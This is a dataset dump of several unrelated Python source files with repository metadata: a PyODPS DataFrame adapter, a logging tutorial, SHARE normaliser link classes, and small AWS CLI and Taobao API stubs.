'inputs': [(idx, 'input%d' % idx, PortType.DATA) for idx in range(1, input_num + 1)],
'outputs': [(1, 'output', PortType.DATA)]
})
def optimize(self):
# feed cache_data backwards
for nm, inp in six.iteritems(self.inputs):
obj = inp.obj
if not hasattr(obj, 'df'):
continue
if obj.df is None or not context.is_cached(obj.df):
continue
for edge in self.input_edges[nm]:
src_output = edge.from_node.outputs[edge.from_arg]
if src_output.obj and not context.is_cached(src_output.obj.df):
context.cache(src_output.obj.df, context.get_cached(obj.df))
if len(self.outputs) != 1:
return False, None
out_port = six.next(six.itervalues(self.outputs))
ep = out_port.obj
if ep is None:
return False, None
df = ep.df
if not self.inputs and isinstance(df, DataFrame):
# direct table input
data_sources = list(df.data_source())
if len(data_sources) == 1 and hasattr(data_sources[0], '_client'):
ep.table = data_sources[0].name
return True, None
elif not self.inputs and isinstance(df, FilterPartitionCollectionExpr) and isinstance(ep.df.input, DataFrame):
# direct partitioned table input
data_sources = list(df.input.data_source())
if len(data_sources) == 1 and hasattr(data_sources[0], '_client'):
ep.table = data_sources[0].name
ep.partitions = ep.df.predicate_string
return True, None
elif context.is_cached(df):
# cached data input
ep.table = context.get_cached(df).name
return True, None
return False, None
class DFExecNode(DFNode):
def __init__(self, bind_df=None, input_num=1, func=None, args=None, kwargs=None):
super(DFExecNode, self).__init__(input_num)
self.parameters.update(dict(args_hash=hash(frozenset(args)), kwargs_hash=hash(frozenset(six.iteritems(kwargs)))))
self.bind_df = bind_df
self.args = args
self.kwargs = kwargs
self.func = func
self.sink = None
def optimize(self):
if len(self.args) != 2 or len(self.inputs) != 1:
return False, None
if not isinstance(self.bind_df._source_data, DFIntermediateTable) or \
not self.bind_df._source_data.intermediate:
return False, None
ep = self.inputs['input1'].obj
if ep is not None:
# direct df output
if self.func.__name__ == 'persist' and self.bind_df == ep.df:
tables = []
for pep in ep._get_adapter_chain():
pep.table = self.args[1]
tables.append(pep.table)
return True, ObjectDescription(tables=tables, node_id=id(ep._bind_node))
return False, None
def adapter_from_df(df, odps=None, skip_orphan=False):
if df in _df_endpoint_dict:
return _df_endpoint_dict[df]
else:
closest_links = list(df.to_dag(False).closest_ancestors(df, lambda d: d in _df_endpoint_dict))
DFAdapter._add_df_link(df, *closest_links)
input_eps = [_df_endpoint_dict.get(f) for f in closest_links]
if skip_orphan and not input_eps:
return None
node = DFNode(len(input_eps))
for idx, inp_ep in enumerate(input_eps):
inp_ep._link_node(node, 'input%d' % (idx + 1))
odps = None
for source in df.data_source():
if hasattr(source, 'odps'):
odps = source.odps
break
if odps is None:
from ...inter import enter, InteractiveError
from ... import ODPS
if options.account is not None and options.default_project is not None:
odps = ODPS._from_account(
options.account, options.default_project,
endpoint=options.end_point, tunnel_endpoint=options.tunnel_endpoint
)
else:
try:
odps = enter().odps
except (InteractiveError, AttributeError):
import warnings
warnings.warn('No ODPS object available in rooms. Use odps.to_global() to make your ODPS object global.',
RuntimeWarning)
return DFAdapter(odps, node.outputs['output'], df, uplink=input_eps)
def convert_df_args(arg):
if arg is None:
return None
if isinstance(arg, (CollectionExpr, SequenceExpr)):
return adapter_from_df(arg)
if isinstance(arg, dict):
return dict((k, convert_df_args(v)) for k, v in six.iteritems(arg))
elif isinstance(arg, list):
return [convert_df_args(v) for v in arg]
elif isinstance(arg, tuple):
return tuple(convert_df_args(v) for v in arg)
elif isinstance(arg, set):
return set(convert_df_args(v) for v in arg)
else:
return arg
def extract_df_inputs(o):
if isinstance(o, (CollectionExpr, SequenceExpr, Scalar)):
yield o
elif isinstance(o, dict):
for v in itertools.chain(*(extract_df_inputs(dv) for dv in six.itervalues(o))):
if v is not None:
yield v
elif isinstance(o, (list, set, tuple)):
for v in itertools.chain(*(extract_df_inputs(dv) for dv in o)):
if v is not None:
yield v
else:
yield None
class PartitionSelection(object):
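# Accepts partition specs such as "pt=20170101/region='bj',pt=20170102":
# "/" joins AND-ed key=value pairs and "," separates OR-ed alternatives
# (a reading inferred from the parsing and to_sql_condition below).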
def __init__(self, part_def):
if isinstance(part_def, six.string_types):
self.parts = [[self._parse_sub_part(part) for part in one_part.split('/')] for one_part in part_def.split(',')]
else:
def parse_single_part(part_repr):
if isinstance(part_repr, six.string_types):
for sub_part in part_repr.split('/'):
yield self._parse_sub_part(sub_part)
else:
for sub_part in part_repr:
if isinstance(sub_part, six.string_types):
yield self._parse_sub_part(sub_part)
else:
yield sub_part
self.parts = [list(parse_single_part(part_repr)) for part_repr in part_def]
@staticmethod
def _parse_sub_part(p):
parts = p.strip().split('=', 1)
if parts[1].startswith('\'') or parts[1].startswith('\"'):
parts[1] = parts[1].strip('"\'').decode('string-escape')
else:
parts[1] = int(parts[1])
return parts
@staticmethod
def _repr_sub_part(p):
parts = copy.deepcopy(p)
if isinstance(parts[1], six.string_types):
parts[1] = '\"{0}\"'.format(str(parts[1]))
else:
parts[1] = str(parts[1])
return '='.join(parts)
def __iter__(self):
return iter(self.parts)
def __getitem__(self, item):
return self.parts[item]
def __repr__(self):
return ','.join('/'.join(self._repr_sub_part(part) for part in one_part) for one_part in self.parts)
def to_sql_condition(self):
return '(' + ') or ('.join(' and '.join(self._repr_sub_part(part) for part in one_part) for one_part in self.parts) + ')'
def to_partition_fields(self):
return list(reduce(lambda a, b: a + b, map(lambda a: [a[0], ], self.parts), []))
def to_partition_spec(self, pid):
return ','.join('='.join(a) for a in self.parts[pid])
class DFAdapter(RunnerObject):
def __init__(self, odps, port, df, **kw):
super(DFAdapter, self).__init__(odps, port)
self._df_ref = weakref.ref(df) if df is not None else None
self._uplink = kw.pop('uplink', [])
self._operations = []
self._table = None
self._partitions = None
self._custom_reload_functions = []
if df is not None:
_df_endpoint_dict[df] = self
from ..context import RunnerContext
RunnerContext.instance()._obj_container.register(self)
if port.obj_uuid is None:
port.obj_uuid = self._obj_uuid
if hasattr(self, 'init_df'):
self.init_df(self.df, **kw)
@staticmethod
def _add_df_link(df, *depends):
if not depends:
return
if df not in _df_link_maintainer:
_df_link_maintainer[df] = set()
_df_link_maintainer[df] |= set(depends)
@staticmethod
def _build_mock_table(table_name, schema, odps=None):
client = odps.rest if odps else None
return DFIntermediateTable(name=table_name, schema=schema, client=client)
def gen_temp_names(self):
if not self.table:
self.table = gen_table_name(self._bind_node.code_name, node_id=self._bind_node.node_id,
seq=self._bind_port.seq)
return ObjectDescription(tables=[self.table, ])
else:
return None
def _get_adapter_chain(self):
if len(self._uplink) == 1:
upds = self._uplink[0]
if (upds._bind_node, upds._bind_port) == (self._bind_node, self._bind_port):
chain = upds._get_adapter_chain() + [self, ]
else:
chain = [self, ]
else:
chain = [self, ]
return chain
def describe(self):
if self._partitions is None:
table_desc = self.table
else:
table_desc = (self.table, self.partitions)
return ObjectDescription(tables=table_desc, fields=self._fields)
def fill(self, desc):
if desc.tables:
if isinstance(desc.tables[0], tuple):
self.table, self.partitions = desc.tables[0]
else:
self.table, self.partitions = desc.tables[0], None
if desc.fields:
self._fields = desc.fields
self.df_from_fields(force_create=True)
@property
def table(self):
if self._table is not None:
return self._table
elif len(self._uplink) == 1:
upds = self._uplink[0]
if (upds._bind_node, upds._bind_port) == (self._bind_node, self._bind_port):
return upds.table
else:
return None
else:
return None
@table.setter
def table(self, value):
self._table = value
@property
def partitions(self):
if self._partitions is not None:
return self._partitions
elif len(self._uplink) == 1:
upds = self._uplink[0]
if (upds._bind_node, upds._bind_port) == (self._bind_node, self._bind_port):
return upds.partitions
else:
return None
else:
return None
@partitions.setter
def partitions(self, value):
if value:
self._partitions = value if isinstance(value, PartitionSelection) else PartitionSelection(value)
else:
self._partitions = None
@property
def df(self):
df_obj = self._df_ref() if self._df_ref is not None else None
return to_df_collection(df_obj) if df_obj is not None else None
@df.setter
def df(self, value):
if value is None or self._df_ref is None or id(value) != id(self._df_ref()):
if self._df_ref is not None and self._df_ref() in _df_endpoint_dict:
del _df_endpoint_dict[self._df_ref()]
if value is None:
self._df_ref = None
else:
self._add_df_link(value, *(adapter.df for adapter in self._uplink if adapter.df is not None))
_df_endpoint_dict[value] = self
self._df_ref = weakref.ref(value)
if hasattr(self, 'update_df'):
self.update_df(value)
@property
def fields(self):
if self.df is not None:
fields = set(c.name for c in self.df.schema.columns)
return [f for f in self._fields if f.name in fields]
return self._fields
def reload(self):
if isinstance(self.df, DataFrame) and all(hasattr(source, 'odps') for source in self.df.data_source()):
if '.' in self.table:
proj, table = self.table.split('.', 1)
else:
proj, table = None, self.table
new_df = DataFrame(self._odps.get_table(table, project=proj))
table_obj = self.df._source_data
if isinstance(table_obj, DFIntermediateTable):
new_table_obj = new_df._source_data
for s in Table.__slots__:
setattr(table_obj, s, getattr(new_table_obj, s))
table_obj.intermediate = False
self.df._schema = new_df._schema
if isinstance(self.df, DynamicMixin):
self.df._schema = new_df._schema
self.df.__class__ = DataFrame
for func in self._custom_reload_functions:
func()
def _link_incoming_dfs(self):
if self.df is None:
return
for p in six.itervalues(self._bind_node.inputs):
obj = p.obj
if obj is not None and isinstance(obj, DFAdapter):
self._add_df_link(self.df, obj.df)
def _duplicate_df_adapter(self, port, df=None):
if df is None:
df = self.df.copy()
elif self.df is not None:
self._add_df_link(df, self.df)
ep = DFAdapter(self._odps, port, df=df)
ep._link_incoming_dfs()
for p in six.itervalues(ep._bind_node.inputs):
obj = p.obj
if obj is not None and isinstance(obj, DFAdapter):
self._add_df_link(df, obj.df)
for attr, value in six.iteritems(vars(self)):
if not hasattr(ep, attr):
setattr(ep, attr, value)
ep._uplink.append(self)
return ep
def _iter_linked_objs(self):
yield self
if self.df is not None:
yield self.df
def perform_operation(self, op):
if self._uplink:
op.execute(self._uplink, self)
self._operations.append(op)
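# Execution hook attached to DataFrame expressions: calls made outside a
# PyODPS worker thread are rewired into a DFExecNode linked to the upstream
# adapters and executed through the RunnerContext rather than directly.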
def df_run_hook(*args, **kwargs):
self = args[0]
func = kwargs.pop('_df_call')
if threading.current_thread().name.startswith('PyODPS'):
return func(*args, **kwargs)
def _fetch_upspring(df):
df_iter = df.to_dag(False).closest_ancestors(df, lambda d: d in _df_endpoint_dict)
if df in _df_endpoint_dict:
df_iter = itertools.chain(df_iter, (df, ))
return df_iter
dfs = itertools.chain(*(_fetch_upspring(f) for f in itertools.chain(extract_df_inputs(args), extract_df_inputs(kwargs)) if f is not None))
input_eps = [_df_endpoint_dict.get(f) for f in dfs]
if not input_eps:
return func(*args, **kwargs)
node = DFExecNode(self, len(input_eps), func, hashable(args), hashable(kwargs))
for idx, input_ep in enumerate(input_eps):
input_ep._link_node(node, 'input%d' % (1 + idx))
from ..context import RunnerContext
RunnerContext.instance()._run(node)
return node.sink
def install_hook():
from ...df.expr.expressions import register_exec_hook as register_df_exec_hook
register_df_exec_hook(df_run_hook)
install_hook()
| [
"[email protected]"
] | |
891b10c729cc41d184af202fe27ee44fb33c93fb | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_hungers.py | 83a72b5e0211718be8c579621609825ad0454cb4 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py |
#calss header
class _HUNGERS():
def __init__(self,):
self.name = "HUNGERS"
self.definitions = 'hunger'
self.parents = []
self.children = []
self.properties = []
self.jsondata = {}
self.basic = ['hunger']
| [
"[email protected]"
] | |
88482394f3d8b2feadd61f7632ec800377781b29 | 068d271e241d8cdb46dbf4243166e4b8ee7025b2 | /day08/day8/16.logging模块.py | 4c9f15064ad8ca6221e2e72af4b717640d5d9fb1 | [] | no_license | caiqinxiong/python | f6e226e76cb62aac970bcfbcb6c8adfc64858b60 | 9029f6c528d2cb742b600af224e803baa74cbe6a | refs/heads/master | 2023-05-26T19:41:34.911885 | 2020-05-15T09:02:08 | 2020-05-15T09:02:08 | 195,261,757 | 1 | 0 | null | 2021-06-10T23:33:33 | 2019-07-04T15:01:42 | JavaScript | UTF-8 | Python | false | false | 1,266 | py | # import logging
# fh = logging.FileHandler(filename='xxx.log',encoding='utf-8')
# fh1 = logging.FileHandler(filename='xxx2.log',encoding='utf-8')
# sh = logging.StreamHandler()
# logging.basicConfig(level=logging.INFO,
# handlers=[fh,sh,fh1],
# datefmt='%Y-%m-%d %H:%M:%S',
# format='%(asctime)s - %(name)s[%(lineno)d] - %(levelname)s -%(module)s: %(message)s')
# logging.debug('debug message') # 情况越轻
# logging.info('info message') # 信息类的日志
# logging.warning('warning message')
# logging.error('error message')
# logging.critical('critical message')
# logging日志分为5个等级
# 默认只显示warning等级以上的信息
import logging
from logging import handlers
sh = logging.StreamHandler()
rh = handlers.RotatingFileHandler('myapp.log', maxBytes=1024,backupCount=5)
fh = handlers.TimedRotatingFileHandler(filename='myapp2.log', when='s', interval=5, encoding='utf-8')
logging.basicConfig(level=logging.INFO,
handlers=[rh,fh,sh],
datefmt='%Y-%m-%d %H:%M:%S',
format='%(asctime)s - %(name)s[%(lineno)d] - %(levelname)s -%(module)s: %(message)s')
while True:
logging.warning('warning message')
| [
"[email protected]"
] | |
87505b47481663ffa086e48bd4b226ccd4d8700d | c4fa1ebcdd413c4ab3f0979ee3beead8a8809870 | /share/normalize/links.py | 88254c3295a936526c92a7278fe4d6a87efdcd76 | [] | no_license | terroni/SHARE | e47f291db7cf100d29a7904fe820e75d29db1472 | a5631f441da1288722c68785b86128c854cbe7c1 | refs/heads/develop | 2020-12-03T02:29:47.381341 | 2016-07-11T19:40:27 | 2016-07-11T19:40:27 | 63,097,148 | 1 | 0 | null | 2016-07-11T19:45:51 | 2016-07-11T19:45:50 | null | UTF-8 | Python | false | false | 10,985 | py | import threading
from functools import reduce
from collections import deque
import xmltodict
import arrow
from lxml import etree
from pycountry import languages
from nameparser import HumanName
__all__ = ('ParseDate', 'ParseName', 'ParseLanguage', 'Trim', 'Concat', 'Map', 'Delegate', 'Maybe', 'XPath', 'Join', 'RunPython', 'Static')
#### Public API ####
def ParseDate(chain):
return chain + DateParserLink()
def ParseName(chain):
return chain + NameParserLink()
def ParseLanguage(chain):
return chain + LanguageParserLink()
def Trim(chain):
return chain + TrimLink()
def Concat(*chains):
return AnchorLink() + ConcatLink(*chains)
def XPath(chain, path):
return chain + XPathLink(path)
def Join(chain, joiner='\n'):
return AbstractLink.__add__(chain, JoinLink(joiner=joiner))
def Maybe(chain, segment, default=None):
return chain + MaybeLink(segment, default=default)
def Map(chain, *chains):
return Concat(*chains) + IteratorLink() + chain
def Delegate(parser, chain=None):
if chain:
return chain + DelegateLink(parser)
return DelegateLink(parser)
def RunPython(function_name, chain=None, *args, **kwargs):
if chain:
return chain + RunPythonLink(function_name, *args, **kwargs)
return RunPythonLink(function_name, *args, **kwargs)
def Static(value):
return StaticLink(value)
### /Public API
# A wrapper around dicts that can have dicts as keys
class DictHashingDict:
def __init__(self):
self.__inner = {}
def get(self, key, *args):
return self.__inner.get(self._hash(key), *args)
def __getitem__(self, key):
return self.__inner[self._hash(key)]
def __setitem__(self, key, value):
self.__inner[self._hash(key)] = value
def __contains__(self, key):
return self._hash(key) in self.__inner
def _hash(self, val):
if isinstance(val, dict):
val = tuple((k, self._hash(v)) for k, v in val.items())
if isinstance(val, (list, tuple)):
val = tuple(self._hash(v) for v in val)
return val
# BaseClass for all links
# Links are a single step of the parsing process
# Links may not mutate the object passed into them
# A chain is any number of links added together
class AbstractLink:
def __init__(self, _next=None, _prev=None):
# next and prev are generally set by the __add__ method
self._next = _next
self._prev = _prev
# Build the entire chain this link is a part of
# NOTE: This results in the entire chain rather than starting from the current link
def chain(self):
first = self
while first._prev:
first = first._prev
deq = deque([first])
while deq[-1]._next:
deq.append(deq[-1]._next)
return tuple(deq)
# Transformation logic goes here
def execute(self, obj):
raise NotImplementedError
# Add a link into an existing chain
def __add__(self, step):
self._next = step
step._prev = self
return step
def __radd__(self, other):
return self + PrependLink(other)
# For handling paths that are not valid python
# or are already used. IE text, execute, oai:title
# ctx('oai:title')
def __getitem__(self, name):
if isinstance(name, int):
return self + IndexLink(name)
if isinstance(name, str):
return self + PathLink(name)
raise Exception(
'__getitem__ only accepts integers and strings\n'
'Found {}'.format(name)
)
# raise Exception
# Reserved for special cases
# Any other use is an error
def __call__(self, name):
if name == '*':
return self + IteratorLink()
if name == 'parent':
return self + ParentLink()
if name == 'index':
return self + GetIndexLink()
raise Exception(
'"{}" is not a action that __call__ can resolve\n'
'__call__ is reserved for special actions\n'
'If you are trying to access an element use dictionary notation'.format(name)
)
# The preferred way of building paths.
# Can express either json paths or xpaths
# ctx.root.nextelement[0].first_item_attribute
def __getattr__(self, name):
if name[0] == '_':
raise Exception(
'{} has no attribute {}\n'
'NOTE: "_"s are reserved for accessing private attributes\n'
'Use dictionary notation to access elements beginning with "_"s\n'.format(self, name)
)
return self + PathLink(name)
def __repr__(self):
return '<{}()>'.format(self.__class__.__name__)
def run(self, obj):
Context().frames.append({'link': self, 'context': obj})
ret = self.execute(obj)
Context().frames.pop(-1)
return ret
# The begining link for all chains
# Contains logic for executing a chain against an object
# Adding another link to an anchor will result in a copy of the
# original anchor
class AnchorLink(AbstractLink):
def execute(self, obj):
return reduce(lambda acc, cur: cur.run(acc), self.chain()[1:], obj)
class Context(AnchorLink):
__CONTEXT = threading.local()
@property
def jsonld(self):
return {
'@graph': self.graph,
'@context': {}
}
def __init__(self):
super().__init__()
if hasattr(Context.__CONTEXT, '_ctxdict'):
self.__dict__ = Context.__CONTEXT._ctxdict
return
Context.__CONTEXT._ctxdict = self.__dict__
self.clear()
def clear(self):
self.graph = []
self.frames = []
self.parser = None
self._config = None
self.pool = DictHashingDict()
def __add__(self, step):
return AnchorLink() + step
class NameParserLink(AbstractLink):
def execute(self, obj):
return HumanName(obj)
class DateParserLink(AbstractLink):
def execute(self, obj):
return arrow.get(obj).to('UTC').isoformat()
class LanguageParserLink(AbstractLink):
def execute(self, maybe_code):
# Force indices to populate
if not languages._is_loaded:
languages._load()
for kwarg in languages.indices.keys():
try:
return languages.get(**{kwarg: maybe_code}).iso639_3_code
except KeyError:
continue
return None
class ConcatLink(AbstractLink):
def __init__(self, *chains):
self._chains = chains
super().__init__()
def _concat(self, acc, val):
if val is None:
return acc
if not isinstance(val, list):
val = [val]
return acc + [v for v in val if v is not None]
def execute(self, obj):
return reduce(self._concat, [
chain.chain()[0].execute(obj)
for chain in self._chains
], [])
class JoinLink(AbstractLink):
def __init__(self, joiner='\n'):
self._joiner = joiner
super().__init__()
def execute(self, obj):
obj = obj or []
if not isinstance(obj, (list, tuple)):
obj = (obj, )
return self._joiner.join(x for x in obj if x)
class TrimLink(AbstractLink):
def execute(self, obj):
return obj.strip()
class ParentLink(AbstractLink):
def execute(self, obj):
return Context().parent
class IteratorLink(AbstractLink):
def __init__(self):
super().__init__()
self.__anchor = AnchorLink()
def __add__(self, step):
# Attach all new links to the "subchain"
self.__anchor.chain()[-1] + step
return self
def execute(self, obj):
if not isinstance(obj, (list, tuple)):
obj = (obj, )
return [self.__anchor.execute(sub) for sub in obj]
class MaybeLink(AbstractLink):
def __init__(self, segment, default=None):
super().__init__()
self._segment = segment
self._default = default
self.__anchor = AnchorLink()
def __add__(self, step):
# Attach all new links to the "subchain"
self.__anchor.chain()[-1] + step
return self
def execute(self, obj):
if not obj:
return []
val = obj.get(self._segment)
if val:
return self.__anchor.execute(val)
if len(Context().frames) > 1 and isinstance(Context().frames[-2]['link'], (IndexLink, IteratorLink, ConcatLink, JoinLink)):
return []
return self._default
class PathLink(AbstractLink):
def __init__(self, segment):
self._segment = segment
super().__init__()
def execute(self, obj):
return obj[self._segment]
def __repr__(self):
return '<{}({!r})>'.format(self.__class__.__name__, self._segment)
class IndexLink(AbstractLink):
def __init__(self, index):
self._index = index
super().__init__()
def execute(self, obj):
return obj[self._index]
def __repr__(self):
return '<{}([{}])>'.format(self.__class__.__name__, self._index)
class GetIndexLink(AbstractLink):
def execute(self, obj):
for frame in Context().frames[::-1]:
if isinstance(frame['link'], IteratorLink):
return frame['context'].index(obj)
return -1
# return Context().parent.index(obj)
class TextLink(AbstractLink):
def execute(self, obj):
return obj.text
class PrependLink(AbstractLink):
def __init__(self, string):
self._string = string
super().__init__()
def execute(self, obj):
return self._string + obj
class XPathLink(AbstractLink):
def __init__(self, xpath):
self._xpath = xpath
super().__init__()
def execute(self, obj):
unparsed_obj = xmltodict.unparse(obj)
xml_obj = etree.XML(unparsed_obj.encode())
elem = xml_obj.xpath(self._xpath)
elems = [xmltodict.parse(etree.tostring(x)) for x in elem]
if len(elems) == 1 and not isinstance(self._next, (IndexLink, IteratorLink)):
return elems[0]
return elems
class DelegateLink(AbstractLink):
def __init__(self, parser):
self._parser = parser
super().__init__()
def execute(self, obj):
return self._parser(obj).parse()
class RunPythonLink(AbstractLink):
def __init__(self, function_name, *args, **kwargs):
self._function_name = function_name
self._args = args
self._kwargs = kwargs
super().__init__()
def execute(self, obj):
return getattr(Context().parser, self._function_name)(obj, *self._args, **self._kwargs)
class StaticLink(AbstractLink):
def __init__(self, value):
self._value = value
super().__init__()
def execute(self, obj):
return self._value
| [
"[email protected]"
] | |
c3e48a7b3486a9f541e42d8e360ef80d57c5f287 | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /pinpoint_write_f/recommender-configuration_create.py | bf2bef53865f2a8a45fe748c41e6cf0bbc15a86e | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
delete-recommender-configuration : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/delete-recommender-configuration.html
get-recommender-configuration : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/get-recommender-configuration.html
get-recommender-configurations : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/get-recommender-configurations.html
update-recommender-configuration : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/update-recommender-configuration.html
"""
write_parameter("pinpoint", "create-recommender-configuration") | [
"[email protected]"
] | |
a4ea05beb61a1ae9488673785bc21a36590eeb5d | 4569d707a4942d3451f3bbcfebaa8011cc5a128d | /hierwikiplugin/0.9/hierwiki/macros/parentwiki.py | aa746ceb1c51e30ceb2e29e717c30465cb294e13 | [] | no_license | woochica/trachacks | 28749b924c897747faa411876a3739edaed4cff4 | 4fcd4aeba81d734654f5d9ec524218b91d54a0e1 | refs/heads/master | 2021-05-30T02:27:50.209657 | 2013-05-24T17:31:23 | 2013-05-24T17:31:23 | 13,418,837 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,685 | py | # Macros for the HierWiki plugin
from trac.core import *
from trac.wiki.api import IWikiMacroProvider, WikiSystem
from StringIO import StringIO
import re, string, inspect
class ParentWikiMacro(Component):
"""
Inserts a link to the "parent" wiki entry.
This only applies to wikis that have a "/" in their name indicating heirarchy.
e.g. an entry named Java/Introduction will have a parent of Java. All other wiki entries have a parent of WikiStart.
"""
# TODO: Everything until render_macro can be removed once switched to be based on WikiMacroBase
implements(IWikiMacroProvider)
def get_macros(self):
"""Yield the name of the macro based on the class name."""
name = self.__class__.__name__
if name.endswith('Macro'):
name = name[:-5]
yield name
def get_macro_description(self, name):
"""Return the subclass's docstring."""
return inspect.getdoc(self.__class__)
def render_macro(self, req, name, args):
db = self.env.get_db_cnx()
cursor = db.cursor()
buf = StringIO()
prefix = None
if args:
prefix = args.replace('\'', '\'\'')
else:
prefix = req.hdf.getValue('wiki.page_name', '') + '/'
parent = 'WikiStart'
m = re.search("(\S+)/(\S+)$", prefix)
if m:
parent = m.group(1)
buf.write('<a href="%s">' % self.env.href.wiki(parent))
buf.write(parent)
buf.write('</a>\n')
return buf.getvalue()
| [
"coderanger@7322e99d-02ea-0310-aa39-e9a107903beb"
] | coderanger@7322e99d-02ea-0310-aa39-e9a107903beb |
d3b1d9bcf01a6956cb9f8162f90e476652811962 | 4b4828d3c98d76d7bf38f90a015945acc408ddc5 | /PythonAI/Source/W1D4/src/EX_REQ/ex_req_png.py | 13d7a84e8fda327fcf1724af0cd5c4b314c0726e | [] | no_license | Huh-jae-won/Study | cb5d32728e8dcded492e7edb054b500c91ec607c | e4dbc3fef69bb273b62b866fb5ef2a7250222f10 | refs/heads/main | 2023-06-20T13:06:26.691899 | 2021-07-11T07:43:41 | 2021-07-11T07:43:41 | 362,759,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | # 모듈 로딩 -------------------------------------------
import requests
# Data variable declarations -------------------------------------
URL = 'http://wikibook.co.kr/logo.png'
IMG_FILE = '../../data/test.png'
# Fetch the data ------------------------------------
res = requests.get(URL)
if int(res.status_code) == 200:
# Save the data in binary form
with open(IMG_FILE, "wb") as f:
f.write(res.content)
print("saved")
else:
print("ERROR : ", res.status_code) | [
"[email protected]"
] | |
8a8d04b9fceb712b14b32cf15babd104e5f7a9d6 | 61a5f4f9a862a5cb15ba5041bc0eebeb5a73d989 | /virtual/bin/pip3 | 92068ed905cf2a262dfed75c3731340c1c17f4a4 | [
"MIT"
] | permissive | iankabugi/chama | 8c48cb081e5202e6a1b446cd87fec6124fff7e6c | 282a460588c7f4476318314fe139e3b6ec574eb6 | refs/heads/master | 2020-05-02T11:59:01.129404 | 2019-03-27T11:50:20 | 2019-03-27T11:50:20 | 177,946,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | #!/home/ian/Desktop/chama/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
b658f62dc2ae780047fb588ecb481e20ae1822d1 | 9b3f578e63a7e17e2b1bab5f38aa8625b8a80251 | /descarteslabs/client/services/tasks/tests/data/dl_test_package/package/module.py | 281e2167df79dcb724e1afd4151237c60c5b0182 | [
"Apache-2.0"
] | permissive | carderne/descarteslabs-python | e6f7000f08cd1569e0ddd0f7fb8e53abb6765183 | 757b480efb8d58474a3bf07f1dbd90652b46ed64 | refs/heads/master | 2022-12-09T23:19:02.361226 | 2020-08-13T11:52:30 | 2020-08-13T11:52:30 | 287,264,851 | 0 | 0 | NOASSERTION | 2020-08-13T11:46:58 | 2020-08-13T11:46:57 | null | UTF-8 | Python | false | false | 296 | py | a_global = "A global var"
def foo():
print("foo")
def func_foo():
a_local = "A local var"
return a_local + a_global
class outer_class:
class inner_class:
@staticmethod
def func_bar():
a_local = "A local var"
return a_local + a_global
| [
"[email protected]"
] | |
7c50534c50b9a795e870dc44b83879518e77b022 | f8f40422b6da71206bd45cb395761b2b56150b73 | /virl/cli/logs/commands.py | 96d8b20b45417e3518261d827d1d3b814dbf1f88 | [
"MIT"
] | permissive | RunSi/virlutils | 3bb96d8a805ad884578c967c480dc51f98a4cbab | 595bae19ea23ba589e7883bedd2076c40bfc4907 | refs/heads/master | 2021-01-25T13:36:53.273146 | 2017-12-15T20:06:42 | 2017-12-15T20:06:42 | 123,597,468 | 0 | 0 | MIT | 2018-03-02T15:42:22 | 2018-03-02T15:42:22 | null | UTF-8 | Python | false | false | 558 | py | import click
from virl.api import VIRLServer
from virl.cli.views import log_table
from virl import helpers
@click.command()
@click.argument('env', default='default')
def logs(env, **kwargs):
"""
Retrieves log information for the provided simulation
"""
running = helpers.check_sim_running(env)
if running:
sim_name = running
server = VIRLServer()
resp = server.get_logs(sim_name)
log_table(resp.json()['events'])
else:
click.secho("could not find logs for for env: {}".format(env), fg='red')
| [
"[email protected]"
] | |
59bf04653400bc0082de29089c4bffcf7a9921fa | 528f910908885c3ded4ecc6380b9603c8dcacbd6 | /tbapi/top/api/rest/FenxiaoProductSkuUpdateRequest.py | c720f4a5fcd2ed51753fc1fa937f037da27ea87c | [] | no_license | Monica-ckd/data007 | 15fe9c4c898a51a58100138b6b064211199d2ed1 | 0e54ae57eb719b86ec14ce9f77b027882a3398a8 | refs/heads/master | 2023-03-16T05:26:14.257318 | 2016-05-25T06:57:05 | 2016-05-25T06:57:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | '''
Created by auto_sdk on 2013-04-01 16:44:41
'''
from top.api.base import RestApi
class FenxiaoProductSkuUpdateRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.agent_cost_price = None
self.dealer_cost_price = None
self.product_id = None
self.properties = None
self.quantity = None
self.sku_number = None
self.standard_price = None
def getapiname(self):
return 'taobao.fenxiao.product.sku.update'
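
# Hedged usage sketch (not part of the generated SDK file; the field values
# are placeholders, and the execution step depends on how the surrounding
# project wires app keys into RestApi):
#
#   req = FenxiaoProductSkuUpdateRequest()
#   req.product_id = 12345
#   req.sku_number = 'sku-001'
#   req.standard_price = '99.00'
#   # ...then execute the request through the SDK's HTTP layer
#   # (e.g. getResponse(), if the base class provides it).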
| [
"[email protected]"
] | |
